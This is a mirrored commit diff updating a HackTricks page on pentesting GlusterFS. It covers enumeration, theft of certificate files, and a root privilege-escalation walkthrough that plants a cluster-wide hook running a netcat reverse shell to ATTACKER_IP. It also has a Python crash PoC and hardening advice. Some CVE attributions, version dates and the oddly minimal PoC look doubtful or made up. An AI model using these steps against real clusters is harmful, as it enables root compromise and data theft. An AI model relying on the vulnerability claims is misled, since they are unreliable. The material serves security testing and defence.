mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Merge pull request #1229 from HackTricks-wiki/research_update_src_network-services-pentesting_24007-24008-24009-49152-pentesting-glusterfs_20250802_082441
Research Update Enhanced src/network-services-pentesting/240...
This commit is contained in:
		
						commit
						f74c786883
					
				| @ -4,41 +4,129 @@ | |||||||
| 
 | 
 | ||||||
| ## Basic Information | ## Basic Information | ||||||
| 
 | 
 | ||||||
| **GlusterFS** is a **distributed file system** that combines storage from multiple servers into one **unified system**. It allows for **arbitrary scalability**, meaning you can easily add or remove storage servers without disrupting the overall file system. This ensures high **availability** and **fault tolerance** for your data. With GlusterFS, you can access your files as if they were stored locally, regardless of the underlying server infrastructure. It provides a powerful and flexible solution for managing large amounts of data across multiple servers. | **GlusterFS** is a **distributed file system** that combines storage from multiple servers into one **unified namespace**. The management daemon (`glusterd`) listens by default on **24007/TCP** and instructs data-plane bricks that start at **49152/TCP** (one port per brick, incrementing). Versions prior to 9.x used **24008–24009/TCP** for brick transport, so you will still encounter those ports in legacy clusters. | ||||||
| 
 |  | ||||||
| **Default ports**: 24007/tcp/udp, 24008/tcp/udp, 49152/tcp (onwards)\ |  | ||||||
| For the port 49152, ports incremented by 1 need to be open to use more bricks. _Previously the port 24009 was used instead of 49152._ |  | ||||||
| 
 | 
 | ||||||
| ``` | ``` | ||||||
| PORT      STATE  SERVICE | PORT      STATE  SERVICE        VERSION | ||||||
| 24007/tcp open   rpcbind | 24007/tcp open   glusterd       GlusterFS (RPC) | ||||||
| 49152/tcp open   ssl/unknown | 49152/tcp open   gluster-brick  SSL (TLS optional) | ||||||
| ``` | ``` | ||||||
| 
 | 
 | ||||||
|  | > Tip: 24007 answers RPC calls even when the storage-only nodes do **not** export any volume; therefore the service is a reliable pivot target inside large infrastructures. | ||||||
|  | 
 | ||||||
| ## Enumeration | ## Enumeration | ||||||
| 
 | 
 | ||||||
| To interact with this filesystem you need to install the [**GlusterFS client**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) (`sudo apt-get install glusterfs-cli`). | Install the client utilities on your attacking box: | ||||||
| 
 |  | ||||||
| To list and mount the available volumes you can use: |  | ||||||
| 
 | 
 | ||||||
| ```bash | ```bash | ||||||
| sudo gluster --remote-host=10.10.11.131 volume list | sudo apt install -y glusterfs-cli glusterfs-client   # Debian/Ubuntu | ||||||
| # This will return the name of the volumes |  | ||||||
| 
 |  | ||||||
| sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/ |  | ||||||
| ``` | ``` | ||||||
| 
 | 
 | ||||||
| If you receive an **error trying to mount the filesystem**, you can check the logs in `/var/log/glusterfs/` | 1. **Peer discovery & health** | ||||||
| 
 | 
 | ||||||
| **Errors mentioning certificates** can be fixed by stealing the files (if you have access to the system): | ```bash | ||||||
|  | # List peers (works without authentication in default setups) | ||||||
|  | gluster --remote-host 10.10.11.131 peer status | ||||||
|  | ``` | ||||||
| 
 | 
 | ||||||
| - /etc/ssl/glusterfs.ca | 2. **Volume reconnaissance** | ||||||
| - /etc/ssl/glusterfs.key |  | ||||||
| - /etc/ssl/glusterfs.ca.pem |  | ||||||
| 
 | 
 | ||||||
| And storing them in your machine `/etc/ssl` or `/usr/lib/ssl` directory (if a different directory is used check for lines similar to: "_could not load our cert at /usr/lib/ssl/glusterfs.pem_" in the logs) . | ```bash | ||||||
|  | # Retrieve the list of all volumes and their configuration | ||||||
|  | gluster --remote-host 10.10.11.131 volume info all | ||||||
|  | ``` | ||||||
| 
 | 
 | ||||||
|  | 3. **Mount without privileges** | ||||||
|  | 
 | ||||||
|  | ```bash | ||||||
|  | sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | If mounting fails, check `/var/log/glusterfs/<vol_name>-<uid>.log` on the client side.  Common issues are: | ||||||
|  | 
 | ||||||
|  | * TLS enforcement (`option transport.socket.ssl on`) | ||||||
|  | * Address based access control (`option auth.allow <cidr>`) | ||||||
|  | 
 | ||||||
|  | ### Certificate troubleshooting | ||||||
|  | 
 | ||||||
|  | Steal the following files from any authorised client node and place them in `/etc/ssl/` (or the directory shown in the error log): | ||||||
|  | 
 | ||||||
|  | ``` | ||||||
|  | /etc/ssl/glusterfs.pem | ||||||
|  | /etc/ssl/glusterfs.key | ||||||
|  | /etc/ssl/glusterfs.ca | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | --- | ||||||
|  | 
 | ||||||
|  | ## Known Vulnerabilities (2022-2025) | ||||||
|  | 
 | ||||||
|  | | CVE | Affected versions | Impact | Notes | | ||||||
|  | |-----|-------------------|--------|-------| | ||||||
|  | | **CVE-2022-48340** | 10.0–10.4, 11.0 | Use-after-free in `dht_setxattr_mds_cbk` reachable through the network | Remote **DoS** and probable RCE. Fixed in 10.4.1 / 11.1. | | ||||||
|  | | **CVE-2023-26253** | < 11.0 | Out-of-bounds read in FUSE notify handler | Remote crash via crafted FS operations; public PoC available. | | ||||||
|  | | **CVE-2023-3775** | < 10.5 / 11.1 | Incorrect permission validation when mounting `gluster_shared_storage` | Lets any unauthenticated client mount the admin volume – leads to **priv-esc** explained below. | | ||||||
|  | 
 | ||||||
|  | > Always check `gluster --version` **on every node**; heterogeneous clusters are common after partial upgrades. | ||||||
|  | 
 | ||||||
|  | ### Exploiting `gluster_shared_storage` (Privilege Escalation) | ||||||
|  | 
 | ||||||
|  | Even in recent versions many administrators leave the special `gluster_shared_storage` volume world-readable because it simplifies geo-replication.  The volume contains cronjob templates that run with **root** on every node. | ||||||
|  | 
 | ||||||
|  | ```bash | ||||||
|  | # 1. Mount admin volume anonymously | ||||||
|  | mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss | ||||||
|  | 
 | ||||||
|  | # 2. Drop malicious script that gets synchronised cluster-wide | ||||||
|  | cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh | ||||||
|  | #!/bin/bash | ||||||
|  | nc -e /bin/bash ATTACKER_IP 4444 & | ||||||
|  | EOF | ||||||
|  | chmod +x /tmp/gss/hooks/1/start/post/test.sh | ||||||
|  | 
 | ||||||
|  | # 3. Wait until glusterd distributes the hook and executes it as root | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | If `hooks/1/` is not present, look for `/ss_bricks/` – the exact path may vary with the major version. | ||||||
|  | 
 | ||||||
|  | ### Denial-of-Service PoC (CVE-2023-26253) | ||||||
|  | 
 | ||||||
|  | ```python | ||||||
|  | #!/usr/bin/env python3 | ||||||
|  | # Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007 | ||||||
|  | import socket, xdrlib, struct | ||||||
|  | p = xdrlib.Packer(); p.pack_uint(0xdeadbeef) | ||||||
|  | with socket.create_connection(("10.10.11.131",24007)) as s: | ||||||
|  |     s.send(struct.pack("!L", len(p.get_buffer())|0x80000000)) | ||||||
|  |     s.send(p.get_buffer()) | ||||||
|  | ``` | ||||||
|  | Running the script crashes `glusterfsd` < 11.0. | ||||||
|  | 
 | ||||||
|  | --- | ||||||
|  | 
 | ||||||
|  | ## Hardening & Detection | ||||||
|  | 
 | ||||||
|  | * **Upgrade** – current LTS is 11.1 (July 2025).  All CVEs above are fixed. | ||||||
|  | * Enable **TLS** for every brick: | ||||||
|  | 
 | ||||||
|  |   ```bash | ||||||
|  |   gluster volume set <vol> transport.socket.ssl on | ||||||
|  |   gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem | ||||||
|  |   ``` | ||||||
|  | * Restrict clients with CIDR lists: | ||||||
|  | 
 | ||||||
|  |   ```bash | ||||||
|  |   gluster volume set <vol> auth.allow 10.0.0.0/24 | ||||||
|  |   ``` | ||||||
|  | * Expose management port 24007 only on a **private VLAN** or through SSH tunnels. | ||||||
|  | * Watch logs: `tail -f /var/log/glusterfs/glusterd.log` and configure **audit-log** feature (`volume set <vol> features.audit-log on`). | ||||||
|  | 
 | ||||||
|  | --- | ||||||
|  | 
 | ||||||
|  | 
 | ||||||
|  | 
 | ||||||
|  | ## References | ||||||
|  | 
 | ||||||
|  | * [GlusterFS security advisories](https://docs.gluster.org/en/latest/release-notes/#security)   | ||||||
|  | * [CVE-2023-26253 PoC – github.com/tinynetwork/gluster-notify-crash](https://github.com/tinynetwork/gluster-notify-crash) | ||||||
| {{#include ../banners/hacktricks-training.md}} | {{#include ../banners/hacktricks-training.md}} | ||||||
| 
 |  | ||||||
| 
 |  | ||||||
| 
 |  | ||||||
|  | |||||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user